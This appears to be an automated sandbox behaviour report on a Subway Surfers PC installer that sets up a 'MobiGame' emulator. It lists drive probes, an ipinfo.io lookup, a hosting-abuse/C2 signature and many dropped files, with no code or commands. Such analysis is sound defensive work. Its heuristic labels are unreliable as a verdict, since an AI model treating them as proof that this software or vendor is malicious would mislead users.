File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001b C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\53205359a4035ca2_s C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\a5351d2e-a0e3-4530-abc1-536940b0a3f7.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_00000f C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000001.dbtmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\52ee93f9b2ae5957_s C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\d08ad8e6-a8d8-4a95-9b65-e9a75a710eca.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RFe601188.TMP C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_2 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\19fedd4e-550f-4799-a3cc-fadb196fd7ea.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\2b66f54f-9712-45ef-8ee7-0475958414cb.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002c C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000042 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8b64ca19c2bda5ea_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\download_cache C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOCK C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Web Data C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\CURRENT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002a C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\README C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F59A01A8B782D93EA6991BC172CEFFB1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000003 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\72dcc95104717102_s C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\41a4ebffd069515d_s C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens\LOCK C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\948739cf-5a1d-465a-9fa4-539b83d97e8c.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\22c86e29d33fc1a8_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\142bd51bc9662d56_1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\72dcc95104717102_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\91dfffe060b1bd5e_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\88a86287-3dc7-4858-9913-ec3f90df667c.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\6fb5895f-7fc9-4623-b9af-46748646b87f.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5ebae3eea1f01edc_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9412c8b664751f90_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\14ff8116b518ca2d_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe5c8322.TMP C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\efe8c4ae-71ec-48f1-bfb6-9d04b7849e74.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\74b88724f60b0383_s C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\95227679ae2e410c_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002e C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RFe5a301a.TMP C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\0fb8276d-4258-4c75-a8ea-8436e72956c4.tmp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\e2daebc9c47b45a8_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9074c45fcc043b54_1 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_3 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\MobiGame\player\AdbWinApi.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\ca.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\sl.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxSVGA3D.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20231123064155.pma C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\it.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Collections.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxManage.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\android\mobi-android-userdata.vhd C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\api-ms-win-core-processthreads-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\libEGL_angle.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Text.Encoding.CodePages.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\unregister_services.cmd C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxBalloonCtrl.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxNetFlt.inf C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxREM.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\Microsoft.Win32.Primitives.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\dist\static\media\revicons.a77de540a38981833f9e.eot C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Dynamic.Runtime.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxNetNAT.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\android\mobi-android-system-x86.vhd C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\hxeb3pac.newcfg C:\Windows\System32\svchost.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\es.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\hi.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\NetCoreEx.BinaryExtensions.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\api-ms-win-core-debug-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.IO.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Net.Http.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Reflection.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Xml.XmlSerializer.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\id.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.ComponentModel.DataAnnotations.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.ComponentModel.TypeConverter.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\api-ms-win-core-namedpipe-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\swiftshader\libGLESv2.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\Microsoft.Win32.SystemEvents.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Security.Cryptography.Primitives.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxDDU.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxNetAdp6.inf C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\ian2qazz.newcfg C:\Windows\System32\svchost.exe N/A
File created C:\Program Files\MobiGame\playstore\Chromely.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\dist\static\media\fa-regular-400.a3f7358b4bd2b708c04d.woff2 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\haxm\haxm_check.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\Microsoft.Extensions.DependencyInjection.Abstractions.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\locales\tr.pak C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\api-ms-win-core-libraryloader-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\api-ms-win-crt-conio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\Playstore.runtimeconfig.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Transactions.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\gsz4gri4.tmp C:\Windows\system32\rundll32.exe N/A
File created C:\Program Files\MobiGame\player\api-ms-win-core-profile-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\ServiceStack.Common.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.IO.Pipes.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxUSBMon.cat C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\api-ms-win-crt-convert-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\MobiVMMRC.rc C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.IO.FileSystem.DriveInfo.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Security.Cryptography.Csp.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\player\VBoxNetFlt.cat C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\api-ms-win-core-errorhandling-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Globalization.Calendars.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Runtime.Handles.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MobiGame\playstore\System.Security.AccessControl.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\MobiGame\MobiGameUpdater.InstallLog C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIF129.tmp-\WixSharp.UI.dll C:\Windows\system32\rundll32.exe N/A
File created C:\Windows\Installer\SourceHash{9658D5F3-6237-40F7-B727-C7F8CC997DDD} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE26A.tmp-\WixSharp.UI.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI6E40.tmp-\WixSharp.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIF08C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF129.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF129.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI76CE.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI849C.tmp-\InstallUtil.InstallLog C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe N/A
File opened for modification C:\Windows\Installer\MSIAE7F.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIA68D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBD17.tmp-\WixSharp.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIBEB7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI703.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI849C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7E19.tmp-\WixSharp.UI.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI80CA.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI79EC.tmp-\VirtualBoxSetup.exe C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\Installer\MSI7E71.tmp-\VirtualBoxSetup.pdb C:\Windows\system32\rundll32.exe N/A
File created C:\Windows\Installer\e58bd41.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e58bd3a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI732C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI849C.tmp-\CustomAction.config C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI849C.tmp-\WixSharp.dll C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIAE7F.tmp-\VirtualBoxSetup.pdb C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIF129.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI792.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID1AF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI76CE.tmp-\CustomAction.config C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIA68D.tmp-\WixSharp.dll C:\Windows\system32\net.exe N/A
File opened for modification C:\Windows\Installer\MSIBD17.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\system32\rundll32.exe N/A
File created C:\Windows\Installer\e58bd3b.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI86F5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDF7B.tmp-\WixSharp.dll C:\Windows\System32\Conhost.exe N/A
File opened for modification C:\Windows\Installer\MSIE26A.tmp-\VirtualBoxSetup.pdb C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI79EC.tmp-\VirtualBoxSetup.pdb C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\Installer\MSI7E71.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI849C.tmp-\VirtualBoxSetup.exe C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSIBD17.tmp-\CustomAction.config C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI483E.tmp C:\Windows\system32\msiexec.exe N/A
